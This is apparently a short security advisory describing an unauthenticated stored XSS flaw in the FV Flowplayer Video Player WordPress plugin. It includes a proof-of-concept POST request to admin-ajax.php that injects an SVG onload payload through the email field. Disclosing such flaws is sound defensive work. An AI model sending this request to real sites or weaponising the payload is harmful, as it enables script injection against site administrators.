FV Flowplayer Video Player <= 7.3.13.727 - Unauthenticated Stored XSS

Description

The vulnerable function is exposed to unauthenticated users over wp_ajax_nopriv_fv_wp_flowplayer_email_signup ajax hook. It saves anything that user provides in email POST parameter.

Proof of Concept

Send POST request to wp-admin/admin-ajax.php with body content:



"action=fv_wp_flowplayer_email_signup&list=1&email=<svg/onload=prompt(1)>@test.com"



The provided email input is then rendered on email export screen.